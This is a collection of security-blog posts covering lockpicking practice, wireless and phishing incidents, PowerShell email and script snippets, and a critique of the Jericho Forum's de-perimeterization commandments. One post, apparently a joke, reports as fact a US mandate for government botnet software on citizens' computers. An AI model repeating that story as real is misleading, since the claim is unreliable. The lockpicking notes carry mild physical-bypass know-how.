What I would choose is as good in the best of breed as I can afford in time and money based on my company size. As a techie, I'd much prefer best of breed over all-in-one behemoths. I tend to find best of breeds to be more trustworthy and much more surgical in their approaches. In a way, that illustrates a comparison. Would you prefer a specialized surgeon to perform operation X, or a more commoditized but affordable provider? What about for a routine operation? Do you want a common product or something specialized? Agility?

Compliance promotes this idea as does the maturing of the security industry, but should we really settle for "Good Enough" security? Perhaps that is pragmatic, but I'd still like to think anything I secure is better than the typical Good Enough...

[1] If you know this song, props to you, you have some taste!

I've previously mentioned that I'm getting into lockpicking, and I continue to practice in small pieces of spare time. Last week I picked my first non-practice lock, a 5-pin dead bolt in my apartment. Just tonight I sat down to try it again and picked it three times in 6 minutes. I'm a little scared, but happy with my progress!

I've been able to start to actually feel the various "gives" when a pin is set, as well as the sounds. Sometimes there is a small give in the torque when a pin clears. Sometimes a small click. Sometimes it is the lack of tactile response from the pin when it is set and the spring no longer pushes down on the pick. All of these evidences are getting more and more common. I'm even surprised more and more at how easy raking a lock open can be. Raking involves moving a jagged rake pick in and out of the key way such that several pins quickly set, as opposed to picking the pins one by one. Insert torque, slide in a rake pick, and before I've even completed two "rakes" the lock is open. I've done that a few times much to my surprise. If you know what a bumping is, raking is smack in the middle of the spectrum between bumping and pin-by-pin picking.

Sunday evening I watched War in the theater and for the first third of the movie and through the previews had a lock and pick in my hands just opening it over and over, while not trying to create a pattern of it. I don't want to unlock my locks just because I follow the same pattern each time, but rather to open them through actual semi-conscious effort.

So far it has been working, and is quite a nice little idle activity. I might move up to my cut out spool pin lock this week. You can see a picture of a spool pin towards the bottom of this really interesting page on lockpicking. This page looks like something nice to read. I especially enjoyed skimming down to the part about unset/unbinding pins and the various states, plus how they feel so as to identify the state.

The Register posted an article about Max Butler being busted again by authorities. Two things about this article.

1) As if we don't need more awareness of wireless insecurity...oh wait, obviously we do. Max would go to hotels and intercept wireless communications. Hello there, ripe opportunities!

2) In the bootnote, I see, "Some kids think they can't get into trouble for hacking computer systems..." Now, let's look at crime in general, let alone digital crime. I'd be willing to say that people are not so much caught breaking into something as they are caught bragging about it or trying to sell any goods they stole from said breaking or hacking. If I intercept and break into your wireless network from a hotel room, unless I'm stupid and visited my gmail account on your network, you likely aren't going to have anything on me. If I steal your wallet, I'm a ghost. Until I show up at the grocery store and attempt to use that credit card or cash that paycheck you received....

However, I would say an exception would be when you discover a break-in while it is in progress. A guard seeing someone climb a fence could stop a theft and arrest the intruder. The same might be said about a digital break-in, possibly. But still, a breakin where I actually get away means I'm a ghost.

I want to brainstorm a moment. The steps of a theft?

a) Someone decides to commit a crime. Often, crime occurs in a moment of opportunity or desparation. I don't plan to steal someone's wallet, but when I see it just lying there, or that accountant computer sitting unlocked... Or I can't pay my bills and absolutely need money or go homeless... Otherwise, commiting a crime typically means overcoming some internal moral compass and disregarding external moral judgements. Many people don't run red lights because that's Just Bad or because other people are watching. Same with many crimes. They don't occur because they are Just Bad. Which is why the first time is the hardest, and repeating offenses are so important to watch. Other than maintaining cultural morals, you can't do much about this. The digital age has largely removed the "people are watching" barrier (the external moral judgements), especially on the Internet. Just ask any child predator.

b) Someone is breaking in. You have a great chance to catch someone here, or thwart their attempts. Guards, alarms, dilligence, logging, monitoring, razorwire, locks.

c) Someone has broken in and left. This is the ghost stage. Unless they left behind some solid evidence, they're a ghost. Take inventory and try to determine motive or start cleaning up.

d) Profiting from the crime. This is the next chance to really catch someone when they attempt to sell the goods or do something with their ill-gotten gains. Whether it is bragging or selling credit cards, this is the next tripwire where you can catch someone. Of course, if the goods are not trackable, such as common cash, then you're still out of luck. If I steal your wallet, grab the cash, then burn the rest, you're still out of luck when I buy some 40s with the cash.

In the workplace, I tend to avoid a the common conversations: money, religion, politics, and even sex. These things tend to be wedges between people. People get way too fanatic about some of them, or it becomes a decisive topic. I'm careful with whom I open up to about those things, and where and when.

Today I clicked to visit a blog site I have in my RSS reader. I clicked through from work and up popped a flat out denial screen because I was using IE as my browser. Now, we make people use IE, but some of us do get to use Firefox when we test or need something new, however I don't make myself a complete standing exception by using IE almost all of the time like every other user. And no, this wasn't just a warning page that let me into the site, but rather a complete, 100% denial of entry.

Seriously, take your browser and OS religion and put it elsewhere. I don't subscribe to political or religious blogs. And while I sometimes read that particular offending blog, I decided it is not worth giving the author another feed hit, so I unsubscribed.

I don't mind people saying Firefox is better, or reminding me that I'm on IE through a splash page. In fact, given the option, I'd use Firefox over IE anyway, which I do at home (and with a blank user-agent). But discriminating users with full denial based on browser choice is ridiculous.

It is not breaking news that fark.com was the victim/target of a hacking attack. But take a moment to think about this attack. Someone sent spam and spoofed emails to Fark employees. The spoofed emails appeared to be from colleagues. The links contained went to websites hosting trojans and other malware, some of which seems to have stolen and sent out pilfered passwords.

Think about how your organization would be protected from an attack like this.

Users don't check email headers, at all. They wouldn't know these messages are spoofed unless there is something obviously wrong or they yell over the cube wall to ask. Should the users even see these emails?

If one user accidentally clicks the link, will their browser be susceptible? Their OS? Their administrative/user level on the system?

Would they know something happened and say something? What if they don't, can you run a history search to see who in your company visited those bad sites?

Will the OS scream bloody hell if a trojan is found? If a trojan is detected by AV but no analysts are around to check the logs, does it do damage?

There's a lot of breakdowns here that I would not be the least surprised are breakdowns in 95% of companies. And guess what...I bet Fark isn't a Fortune 500 and not a huge employer, and they were still the victim of a targeted attack. And no, I don't think user education is a guarantee of protection.

As a side note, I think user education is valuable, but I also think it has some dangers. It shouldn't be used to reassign blame, for instance to some user who clicked on a link when they should have known better from their training. That's not productive punishment or assignment of accountability or blame. Likewise, can you detect when they break down? If not, why bother training? If so, then likely you have the technological means to compensate for less user training. I'm not anti-user training, but I am against viewing at as more than an augment to a company's security posture and culture.

The free Windows MAC-changer tool, Technitium MAC Address Changer has had a new release. Yeah, so what, it's easy to change a registry key, but we all know that once you know the how and why, you want to do things easy and quick, hence tools like this that automate the mundane. This tool should be up there just under the ranks of Cain and NMap as necessary free tools for Windows.

Doing things in PowerShell is often simple, but finding them out for the first time is sometimes not. This little tidbit took a good half hour of my day. I wanted to call another script from my first script. I didn't mind if I needed to wait for execution to finish before moving on, and I had no requirements to pass variables or any information between scripts. This did the job for me:

& "d:\scripts\installwebserver.ps1"

If it can't be done in PowerShell (yet!), there is the option of calling psexec or powershell.exe or cmd.exe directly using Invoke-Expression. MoW talks about calling a process and leveraging the WaitForExit method, which could be useful as well.

MetaGeek has recently updated the Wi-Spy software to Chanalyzer 2.1.6. They also have other softwares for the Mac updated. Oh, and I see Wi-Spy now has a 2.4 product which has an external antenna and has ballooned in price to $400. Ouch! Still, the original is available and the software works with both.

I'm not sure the external antenna is worth the price, and at $400, they're really moving out of consumer-land geekery and into a more small office wireless support market. Unless I consult with wireless analysis and site surveys, I don't think any home user will lay down that much money for this tool.

Read at least the first few paragraphs of this post on 0x000000.com on how security is useless (wish I could remember who maintains that site, since their name isn't apparent). If we're into security or even have a smidgeon of security consciousness in our IT worlds, we've been there. In fact, I think we all need to hit this low point in the rollercoaster of life regularly. Really, that's the point of what we do, right?

Every time I feel this way about security, I am reminded that skilled attackers are still rare and that security does not have to absolutely protect against them. We need to accept that and be happy with that if we're to continue as an industry or even in our happy lives.

I like to think of security like herding cars, holding sand, or visualizing wind. These are all difficult, if not impossible tasks to do perfectly. That doesn't mean we do nothing. Security is not black and white, perfect or useless; to believe so means a belief in a silver bullet to achieving a perfect security state. (Think about it for a while and what implications there are which follow certain beliefs.)

DarkReading has a nice article about war walking near the White House and other DC governmental hubs. This certainly takse a level of moxie to even attempt, as I'm not sure I would even try that.

A few points to pull out. I like the mention of EV-DO and would love to see more security measures and exposures on this. I wonder if there is a way to jam EV-DO signals within your area, but not disrupt normal cell phone technology, for instance on a corporate campus. I like the mention that people (even consultants whom you think should know better) piggy-back on any sort of open wireless network they can get to, even if it discloses sensitive information. And a nice quote:

"Later, Rushing shows me how easy it is for a phisher to duplicate one of these internal 'guest' log-in screens and grab all the traffic from an unsuspecting client. 'I'm surprised we don't see more of that.'"

I'm surprised we don't see more of this either. I think this is simply a bit more difficult for newbies to do, whereas hacking something like WEP has tons of tutorials which can pay off if the newbie is lucky. I like that these topics come up, because while we have this dull buzz in the background about wireless insecurities, it still is nothing more than a dull buzz. A dangerous dull buzz.

Sadly, this article ends on an off note with the following quote:

"'Kids are adding to WIGLE all the time -- it's one of the ways you can look cool,' Rushing says. 'The more APs you've mapped, the cooler you are.'"

If you want to look ignorant and rather retarded, throw a lashout to some useful service and make sure to mention the "kids." Ugh, this was not necessary to an otherwise good article, and really left me thinking that Rushing is just talking out of his ass here.

In response to a United Press International report that China has amassed a botnet of 750,000 computers located in the US, the US has mandated a 2-year timeline to force all Internet Service Providers (ISPs) and customers of those ISPs to run government-sponsored botnet-like programs on their computers. All US computers could then be called into service in the event the US finds itself in a cyber war, or needs to protects its cyber interest by launching distributed denial-of-service (DDoS) pre-emptive strikes against its enemies.

A former senior U.S. information security official says there are nearly three-quarter million personal computers in the United States taken over by Chinese hackers.

An unconfirmed US senator has denounced this situation as unacceptable and requires immediate action by the US military and the Department of Homeland Security.

US officials hope that by mandating installed software on US citizen-owned computers, they can call up these forces when needed to form the largest and most powerful botnet in the world, and reclaim dominance of cyberspace. These measures were rushed through Congress and the Senate and have been approved for immediate action.

An anonymous DHS official enthusiastically commented, "Some systems may be put to work cracking password hashes pilfered from enemy systems, while others may scan the Internet for vulnerable enemy systems, and even others can actively be used to attack other systems in the world. Basically, when needed, we could take control of the system in the background, unbeknownst to the user."

He also added, in concern for ISP cooperation, "ISPs will be forced to require their customers to install our software. They risk losing rights to lines and bandwidth, let alone government penalties, should they not comply."

This software in question is nearing completion, and the software development firm, still a highly secretive organization close to Silicon Valley with ties to Washington, DC, will run in the background of Windows and Mac systems, with Linux versions planned for the near future. It has been rumored this organization has been working closely with specialists from the Secret Service and NSA.

The Frontier for Internet Safety is heavily opposing these new revelations from the US government, but so far has had little to officially say until they can view the software. They have also suddenly become the victim of a currently ongoing DDoS, so their site may not be available at this time. The source of the attack is still unknown.

Hoff recently struck a banner in the ground defending the Jericho Forum's concept of de-perimeterization (alebit not the FUD version) and their commandments (pdf). I typically respect what Hoff has to say (when I understand the topic!), so I decided to stick my nose a bit deeper into the Jericho Forum's position and commandments while trying to keep an open mind. I might just learn something!

First in my examination is checking out their front page which explains de-perimeterization. With such a bold placement, this better be the meat of their message; the why and the what. This also turns out to be the place people create first impressions. Let's chunk this a bit.

today the traditional "firewalled" approach to securing a network boundary is at best flawed, and at worst ineffective. Examples include:

-business demands that tunnel through perimeters or bypass them altogether
-IT products that cross the boundary, encapsulating their protocols within Web protocols
-security exploits that use e-mail and Web to get through the perimeter.

This is stating the obvious, yup, business demands tunnel through barriers, products tunnel through already-trusted protocols, and there is insecurity inside the contents of those protocols. Nothing new here for anyone who has been in IT at any time in the last 10 years. Besides, isn't this the point of internetworks, to share through barriers?

Of course, the point of these barriers is to let certain things through and not let others through. Just because a few holes are poked doesn't mean the barrier is useless. If I put doors to my office with a card reader to slow down the press of bodies to get to work in the morning so my guards can keep a visual for suspicious people, should I get rid of those doors because I'm letting people through already? No.

The Jericho Forum has a point when it tackles tunneling "stuff" through the web protocols which are allowed anyway. I guess we can assume no perimeter devices will deeply inspect packets. But still, I see nothing here that truly suggest the "firewalled" approach is either ineffective or flawed, at least by today's firewall standards.

IT IS DANGEROUS TO ASSUME THAT A SECURITY MEASURE MUST EITHER BE PERFECT OR IS OTHERWISE USELESS! That is the message I get when they call firewalls ineffective or flawed. This just means you need deeper inspection or layered defenses. It is dangerous to say we have a trend of de-perimeterization just because we allow talk between networks.

to respond to future business needs, the break-down of the traditional distinctions between “your” network and “ours” is inevitable

This is pure semantics and means nothing. It's a literary method equivalent to taking a data set in statistics and making it paint a glass half full or glass half empty picture just by playing with the numbers. Besides, I don't think anyone in any company *doesn't* think about "their" network and "everything else." There may be more "other" devices in "my" network these days, and vice versa, but so what? That's not an argument for the disappearing perimeter, per se. It's an argument for more defense in addition to the perimeter.

increasingly, information will flow between business organizations over shared and third-party networks, so that ultimately the only reliable security strategy is to protect the information itself, rather than the network and the rest of the IT infrastructure

This is true in a narrow scope, but again, there is still a line that can be drawn between the aforementioned "our network" and the "everything else." This is obvious when speaking about what you own and what you don't own. You can own the lines and cables and gear up to the demarcation for your ISP, at which point the ISP controls the rest. Has this changed and I didn't realize it? Yes, business has to pump data over a third-party (the Internet, duh) and that information should be protected (duh). But that doesn't imply the perimeter is disappearing. Maybe it is disappearing compared to 25 years ago when information stayed inside buildings.

This statement seems to imply that the only recourse is to protect information. This is great as long as we don't need to ever use that information. Once we open that book that is usually locked in a safe, someone can read over our shoulder, snatch it from our hands, or spill something on it. This is not reality.

The Jericho Forum says this is the trend of de-perimeterization. No, this is a trend in needing defense in depth (depth as in layers or even depth as in deeper inspection at the perimeters). Sadly, defense in depth is a common phrase, and I think their reason for using a "new" term is entirely PR and marketing and to get noticed. Well, they have! :)

So let's just assume they still have a valid point, and there is a need. I'll buy that because I think that is true, and I really want to give them the benefit of the doubt. Next, I will take a look at their de-perimeterization solutions, also available on their front page.

jericho 1 - de-perimeterization and the jericho forum commandments
jericho 2 - the jericho forum and the de-perimeterization solution
jericho 3 - the first three commandments: the fundamentals
jericho 4 - commandments 4 - 8
jericho 5 - commandments 9-11
jericho 6 - my conclusions

I'm going to continue looking at the Jericho Forum's concept of de-perimeterization (god, that's a bitch to type...) and its commandments. In this "chunk," I'm taking the "de-perimeterization solution" section of their main page.

While traditional security solutions like network boundary technology will continue to have their roles, we must respond to their limitations. In a fully de-perimeterized network, every component will be independently secure, requiring systems and data protection on multiple levels, using a mixture of:

I like that they concede that boundary technology will continue to have their roles. They don't stress this enough to address the knee-jerk reaction they get of "oh my god they want us to remove our firewalls!" Sadly, they follow this up with saying every component needs to be independently secure. Ugh...why bother with the first statement, then? Is that network boundary only good for logging now? I think this is a great goal, however, but it should be the juxtaposition of these two ideas: strong boundary with strong systems. This is called defense in depth, which Jericho Forum is seemingly avoiding in exchange for their more dramatic "de-perimeterization" term.

-encryption
-inherently-secure computer protocols
-inherently-secure computer systems
-data-level authentication

That first item is good, but it definitely is a fly in being able to monitor your networks. The role of encryption alone is powerful enough to shape the direction of security for the coming 50 years. They have a big point with this, and if it continues, the effect will be a de-perimeterization for deeper level attacks which we just won't be able to decrypt and inspect without each system becoming an island fortress. Yikes!

The middle two...just make me sigh in bliss. I wish we could do that, but it won't happen. Even things we think are inherently secure today have holes found years from now. This is an ideal, and just won't happen because we're not perfect, but more importantly because it is not economical for most of business. The software and web developer industries are excellent illustrations that there is not enough drive to get things secure up front. The drive is to get things done first, prove that it can make the company money, and later scramble for an SDLC that includes security testing and design near the start. Unless the world turns topsy-turvy in the next 50 years, I just can't see this changing; it's a basic effect of technology, progress, and change.

I'm not sure what is meant by "data-level authentication." Does this mean the data will inherently authenticate users accessing it? I can only guess at this one. It sounds catchy, but could be just empty speak.

The design principles that guide the development of such technology solutions are what we call our “Commandments”, which capture the essential requirements for IT security in a de-perimeterized world.

Great!

jericho 1 - de-perimeterization and the jericho forum commandments
jericho 2 - the jericho forum and the de-perimeterization solution
jericho 3 - the first three commandments: the fundamentals
jericho 4 - commandments 4 - 8
jericho 5 - commandments 9-11
jericho 6 - my conclusions

As I was talking to a colleague yesterday about the Jericho Forum, someone who didn't know about them, it occured to me how "European" this approach is. I guess it might be more accurate to say it is not terribly compatible with typical American approaches. In the US, we hold capitalism and competition very dear. So dear, that we typically choose competition over cooperation. The attitude is "I can do it better and make money," as opposed to "what is best?" The Jericho Forum suggestions greatly smack of the latter. For this reason, I'm not sure the US will ever adopt this early, if ever. Great at innovating! Poor at maturing those innovations.

Moving on to the actual Commandments from the Jericho Forum, I first see they are bookended by some textspeak. This occurs at the beginning:

The Jericho Forum commandments define both the areas and the principles that must be observed when planning for a de-perimeterized future.
Whilst building on “good security”, the commandments specifically address those areas of security that are necessary to deliver a de-perimeterized vision.
The commandments serve as a benchmark by which concepts, solutions, standards and systems can be assessed and measured.

And this occurs at the end:

Conclusion
De-perimeterization has happened, is happening and is inevitable; central protection is decreasing in effectiveness

- It will happen in your corporate lifetime
- Therefore you need to plan for it and should have a roadmap of how to get there
- The Jericho Forum has generic roadmap to assist in the planning

First, the Jericho Forum hasn't led me to conclude these things. Second, I understand this is not a wholistic roadmap to security, but rather a security framework intended to address de-perimeterization. That's a slight cop-out, but ok, I'm willing to accept this.

So, here are the first three commandments, grouped as the Fundamentals.

The scope and level of protection should be specific & appropriate to the asset at risk

- Business demands that security enables business agility and is cost effective
- Whereas boundary firewalls may continue to provide basic network protection, individual systems and data will need to be capable of protecting themselves
- In general, it’s easier to protect an asset the closer protection is provided

The commandment itself is sound, and an extremely common business theme. Same as the first bullet point. I can agree with these outright. The second bullet point, however, gets back to my current non-acceptance of their hypothesis, and as such I'm predictably cautious. I don't know that data should be capable of protecting itself. Since this is tied to the hypothesis, I'll skip it for now. The last bullet point is also dubious. I counter that it is easier to protect assets close when you have a) few assets or b) strong centralized administration of those security controls. But wait...that appears counter to de-centralization everything. Oops! I'd rather not manage 4000 laptops individually like so many isolate islands. This bullet point is a big step back.

Security mechanisms must be pervasive, simple, scalable & easy to manage

- Unnecessary complexity is a threat to good security
- Coherent security principles are required which span all tiers of the architecture
- Security mechanisms must scale; from small objects to large objects
- To be both simple and scalable, interoperable security “building blocks” need to be capable of being combined to provide the required security mechanisms

This second commandment is another no-brainer, although sometimes non-scalable solutions are fine for a company that is not intending to grow out of the solution scale in the lifetime of that solution. Enterprise-level solutions don't necessarily apply to small companies. The other three descriptors are obvious and I do like the commandment itself.

The first bullet point is something that is not mentioned enough, and too often is mentioned as a baseball bat to get your way of doing things. It's a largely non-actionable topic, but it really does matter. Complexity means less people understand what is going on, flaws can occur in the middle of all that complexity, it is not agile, often not scalable, and so on. Sadly, "complex" is a relative term which no one agrees upon except in general principle. The second bullet point says the same thing only inversely: keep things easy to understand. Well, yeah, hopefully!

The third bullet point is part of my minor quibble on this commandment. I don't think everything must scale. This is determined by the company. If this is meant as a framework for the whole world, then yes, I sure would hope solutions are scalable.

The fourth bullet is one I'd love to hear more about as I think I can read it many different ways. Building blocks...like simple components which together form a secure puzzle? Does that affect complexity? Does each building block need to not only be functional but also secure as part of the inherently secure protocols and such? This almost sounds like a "feel good" bullet point that really means nothing and therefore cannot be addressed at all.

Assume context at your peril

- Security solutions designed for one environment may not be transferable to work in another. Thus it is important to understand the limitations of any security solution
- Problems, limitations and issues can come from a variety of sources, including geographic, legal, technical, acceptability of risk, etc.
- Surviving in a hostile world

The first bullet point on this third commandment seems to address my concern above, about solutions being different for different organizations. Likewise, homegrown apps or ways of putting things together in one environment, may not be transferable directly to some other network. That's fine, but doesn't that undercut needing scalability and simplicity? I guess this gets down to, "Is security a commodity product or a customized service?" By having a framework for everyone, I would also follow that with this describing a commodity product. The second bullet supports the first.

The third bullet...eh? I think someone needs to reword that. This commandment and the third bullet mean little alone.

Of note, I really like what "Assume context at your own risk," says to me. It reminds me of things I see on mailing lists repeatedly. A vague security questions answered by 10 people 10 different ways, all of which make assumptions or contextual decisions without really properly asking questions or answering the actual question. Things are different everyone, and we must not assume it is all the same, but instead interrogate stakeholders. Oddly, I don't get the bullet points for this.

jericho 1 - de-perimeterization and the jericho forum commandments
jericho 2 - the jericho forum and the de-perimeterization solution
jericho 3 - the first three commandments: the fundamentals
jericho 4 - commandments 4 - 8
jericho 5 - commandments 9-11
jericho 6 - my conclusions

I previously figured out how to start a PowerShell script from within another script. My next requirement was to start another script that required a variable. This took some trial and error to figure out the arguments need to be outside the quotes.

& "d:\scripts\installwebserver.ps1" SERVERNAME

Mark Curphey has begun a series of posts about scoping application security reviews. Part 1 talks about the business of application security reviews. Part 2 talks about the types of testing. They're good reads, and I'm looking forward to the other parts.

Jericho...commandments...yeah, I can see the searches that drag people here now...great. I'm continuing my look at the commandments from the Jericho Forum. This is commandment 4 which bears the header, Surviving in a Hostile World.

Devices and applications must communicate using open, secure protocols

- Security through obscurity is a flawed assumption - secure protocols demand open peer review to provide robust assessment and thus wide acceptance and use
- The security requirements of confidentiality, integrity and availability (reliability) should be assessed and built in to protocols as appropriate, not added-on
- Encrypted encapsulation should only be used when appropriate and does not solve everything

Oh boy! We hit some tender spots here! I think the assumption about using open protocols is that the more open something is the more secure. I guess if you fully believe in a strict interpretation of the first bullet point, this makes sense. But I find it a dubious claim to accept across the board. They have a point about things being open. Take Skype for instance. I dislike Skype because I have no idea what their encryption consists of because it is not open. Still, I can accept this commandment as part of an ideal framework, but I don't think that reflect reality.

I don't like bullet 1 at all. Security through obscurity is life; deal with it. Security through obscurity alone is not security. That's the proper usage of that phrase. Utilizing obscurity can reduce your risk. Changing the SSH server port to TCP 23412 will lower your risk, but true, it won't increase the inherent security of the SSH server itself. So strictly speaking, I don't buy this bullet point. Also, there are times where if we opened up a protocol to peer review and acceptance, we'll spend 25 years over-analyzing and trying to provide a consensus, and then look back at the bloated monster of a protocol that results. Yikes.

The second bullet makes me think what we're hoping for are god-like tentacles of protocols on the Internet. I just don't think that is going to work. We need simple, small, extensible protocols. They should be solid, scalable, and work well. Confidential? I don't quite buy that...and I'm interested in security. Take the simple building blocks and secure them. I don't know what bullet three is referring to, so I'll skip that one.

All devices must be capable of maintaining their security policy on an untrusted network

- A “security policy” defines the rules with regard to the protection of the asset
- Rules must be complete with respect to an arbitrary context
- Any implementation must be capable of surviving on the raw Internet, e.g., will not break on any input

Again, I get the feeling we're striving for a framework no one can attain. That's not a good goal. This commandment sounds good on one hand, but one bullet and one implication make this taste bitter.

First, I agree that devices need to maintain their security when away from the nest. My caveat comes when a security policy needs to be updated or changed. What then? Does this not mean a digital form of sneakernet or centralized management? This makes me feel like our devices all need to be like H3 Hummers; tanks driving around the big bad roadways. Ugh.

The first two bullets are no-brainers. The third bullet sounds nice, until that last little bit. Will not break on any input. Well, that's great. Again, a nice ideal, but trying to build perfect devices and security by using imperfect people is a stretch for me.

Next, I'm blocking commandments 6-8 into one section since they seem to cover similar ground.

All people, processes, technology must have declared and transparent levels of trust for any transaction to take place

- Trust in this context is establishing understanding between contracting parties to conduct a transaction and the obligations this assigns on each party involved
- Trust models must encompass people/organisations and devices/infrastructure
- Trust level may vary by location, transaction type, user role and transactional risk

Mutual trust assurance levels must be determinable

- Devices and users must be capable of appropriate levels of (mutual) authentication for accessing systems and data
- Authentication and authorisation frameworks must support the trust model

Authentication, authorisation and accountability must interoperate / exchange outside of your locus / area of control

- People/systems must be able to manage permissions of resources and rights of users they don't control
- There must be capability of trusting an organisation, which can authenticate individuals or groups, thus eliminating the need to create separate identities
- In principle, only one instance of person / system / identity may exist, but privacy necessitates the support for multiple instances, or once instance with multiple facets
- Systems must be able to pass on security credentials /assertions
- Multiple loci (areas) of control must be supported

I'm not really sure how to take these three commandments. It sounds like it would be satisfied with a global identification and trust system. That would certainly be fairly perimeterless! But that will never happen, especially in the US. In fact, it is that third bullet, about having trust levels varying, that make me still believe there are perimeters. When a trust level changes, that's where you put some access control. Network access control. Anyway, I can't be too dogged on these three commandments since I don't fully get it.

So what we have so far is very heart-warming, feel-good idealistic goals for a global infrastructure (extrastructure?) utilizing perfect or near perfect protocols and devices that can withstand anything. Sorry, but what the fuck...?

jericho 1 - de-perimeterization and the jericho forum commandments
jericho 2 - the jericho forum and the de-perimeterization solution
jericho 3 - the first three commandments: the fundamentals
jericho 4 - commandments 4 - 8
jericho 5 - commandments 9-11
jericho 6 - my conclusions

Sending emails with PowerShell is pretty straightforward. Emails can be sent either by default through a normal SMTP server or they can be dumped into a local instance of IIS to be picked up and delivered. Both can be useful depending on the situation.

First, I want to prove I can send email from my workstation through the fictious mail server at mail.server.com. Each of the .Send method arguments can be string variables if needed.

$smtp = new-object Net.Mail.SmtpClient("mail.server.com")
$smtp.send("mike@server.com","mike@server.com","test","test")
$smtp

Host : mail.server.com
Port : 25
UseDefaultCredentials : False
Credentials :
Timeout : 100000
ServicePoint : System.Net.ServicePoint
DeliveryMethod : Network
PickupDirectoryLocation :
EnableSsl : False
ClientCertificates : {}

This next example dumps the email to the local IIS instance. Just change the DeliveryMethod and then send the email as normal.

PS> $smtp = new-object Net.Mail.SmtpClient
$smtp.DeliveryMethod = "PickupDirectoryFromIis"
$smtp.send("mike@server.com","mike@server.com","test","test")
$smtp

Host :
Port : 25
UseDefaultCredentials : False
Credentials :
Timeout : 100000
ServicePoint : System.Net.ServicePoint
DeliveryMethod : PickupDirectoryFromIis
PickupDirectoryLocation :
EnableSsl : False
ClientCertificates : {}

I consider this a major part of scripting of any type: notifications. It is not necessarily enough to just log something if you never check logs. I'd rather throw something to the foreground, which includes an actual error, or in the case of a daily notification that a script has run, a quick email to my Inbox. This can even complement logs, such as with a log tail script that emails on certain events. Among many, many other uses.

Continuing my smallish review on the Jericho Forum commandments (pdf) and their concept of de-perimeterization, I have just three commandments left, all under the category, "Access to data."

Access to data should be controlled by security attributes of the data itself

- Attributes can be held within the data (DRM/Metadata) or could be a separate system
- Access / security could be implemented by encryption
- Some data may have “public, non-confidential” attributes
- Access and access rights have a temporal component

This sounds like a Mandatory Access Control system where data contain attributes which determine access and use. This is a bit odd, since I have only heard of this system used by governments (classified, unclassified, top secret...).

This also sounds like DRM, which, nicely enough, is mentioned by term in the bullets! One problem with DRM and metadata is forcing adherence to the metadata or DRM (let's call it collectively DRM for my own sake). What if you have metadata that dictates FileX should only be used by 15 people. What if I come in and read FileX but decide to ignore the DRM tags? Is this another form of encryption? Why can't I just leverage the DRM to get the data and then move it elsewhere as a copy? Sounds familiar? It should, since we're seeing how useful or futile DRM processes can be with media and copyright.

MAC has worked for the government and military for a long time, but I think that has to do with a) the rigid discipline of the military and secret organizations, and b) the long-term habitual, forced use of it. Can this be as rigid and forced globally? At this point in time, I can't see that happening in the foreseeable future.

Overall, oddly, I do like this commandment. Even if I don't buy into the specified mechanics, I agree we need to focus on data. Not to the exclusion of the network or systems, but focusing on the data needs to be part of the security equation.

Data privacy (and security of any asset of sufficiently high value) requires a segregation of duties/privileges

- Permissions, keys, privileges etc. must ultimately fall under independent control, or there will always be a weakest link at the top of the chain of trust
- Administrator access must also be subject to these controls

Hoo-boy..this is a tough one. This commandment pretty much ensures that data protection solutions will be complex. Ultimately, you do need someone who turns the keys when it comes to protection. Maybe two people, or three, but someone somewhere will either have the power or a collusion of forces will have the power. And that's in extremely complex setups for separation of duties/privs.

But even if this commandment is complex and maybe ultimately not of interest or achievable to most organizations, this is a good guideline to try to achieve. Most everyone has domain admin credentials and a need to create accounts in an organization. These tasks/privs can be separated to various people with various auditing and authorization chains.

Is this scalable for small companies with 1 IT person, or even medium-sized companies? Good question, and likely not. Even in my current team of 5 network guys and 3 desktop guys, we really don't have the corporate interest in slowing down our processes to achieve this idea ultimately. We do so for a couple tasks and privileges, but otherwise it is just not worth our time to figure out.

By default, data must be appropriately secured when stored, in transit and in use

- Removing the default must be a conscious act
- High security should not be enforced for everything; “appropriate” implies varying levels with potentially some data not secured at all

In other words, default should be secure. If you want it less secured, you have to choose to unsecure it, or back down on the security controls to an appropriate level. Sounds good to me, although I think this commandment is much more attainable in closed networks, i.e. networks with boundaries.

Oh, wait, hold on...did I say networks with boundaries? Yup! Networks with perimeters! Without perimeters...well, that means either the whole Internet needs to run on new protocols (which I believe the Jericho Forum would like to see happen) or we need a global IPSec (or encryption/PKI) setup that is trusted by all. Ack.

Of interest, it seems this is the only commandment that allows some leniency. Someone determines what is appropriate, rather than blanket, rigid statements like most of the other commandments. Quite interesting to have a subjectivie commandment in here, but still appropriate.

jericho 1 - de-perimeterization and the jericho forum commandments
jericho 2 - the jericho forum and the de-perimeterization solution
jericho 3 - the first three commandments: the fundamentals
jericho 4 - commandments 4 - 8
jericho 5 - commandments 9-11
jericho 6 - my conclusions

I've been checking out theJericho Forum commandments (pdf) and their concept of de-perimeterization. I'm happy to have taken the time to sit back and examine their material posted. Whether I agree or not, it is useful to examine discussion and what other groups think.

1) I stand by my intial thoughts that the concept of "de-perimeterization" is old. I really bet this concept is rooted back in a time before deep inspection firewalls, and maybe even before stateful firewalls. The term is unfortunate and likely needs to be changed, unless they are using it just for the attention. If so, it works! :) But otherwise, I don't buy that de-perimeterization is the future. Sure, maybe borders of yesterday were nice and square like the state of Colarado. But today and maybe into the future our borders will be more complicated like the islands of the Nunavut Territory in Canada (am I the only one who missed the Northern Territories being split? And does that mean I don't know my geography? ...the flaw in quizzing adults about geography and generalizing the result down into child education values...). Nonethless, there are still borders and we will always have a perimeter of some sort for as long as we need any type of centralization management of systems or data.

2) The commandments do make for an excellent ideal. A possibly unattainable ideal. I'm dubious about the scale of such solutions, and I really think this framework only works on a very large scale. Anything below it really can't be bothered.

3) On the other hand, this framework does include excellent guidelines and "rules." Even if they are not followed to a letter, they are rooted in solid digital security concepts. We should keep them in mind no matter what ultimate framework we follow.

4) Likewise, I really think all security professionals should review what the Jericho Forum is saying, and I'd love to attend a presentation some day for even more clarification and discourse. As sec pros, we should be able to discuss such things and keep an open mind about other viewpoints. Besides, if there was an ultimate and perfect solution to our problems, I'm guessing we'd have happened upon it by now and all been wowed to the point of tears. But we're not, and as such, any and all approaches tend to have strong points and good ideas.

5) In the end, do I care about this framework itself? Not really. It's a great exercise, but not really actionable for me in a smaller company beyond just being informed.

jericho 1 - de-perimeterization and the jericho forum commandments
jericho 2 - the jericho forum and the de-perimeterization solution
jericho 3 - the first three commandments: the fundamentals
jericho 4 - commandments 4 - 8
jericho 5 - commandments 9-11
jericho 6 - my conclusions

Articles like this one about DHS looking to investigate a government security contractor illustrate some of the crap (normal business activity) that occurs in our industry. I'm not going to presume I know the full story or what was in the original contract or what Unisys' opinion is, but I think this article illustrates two painful realities.

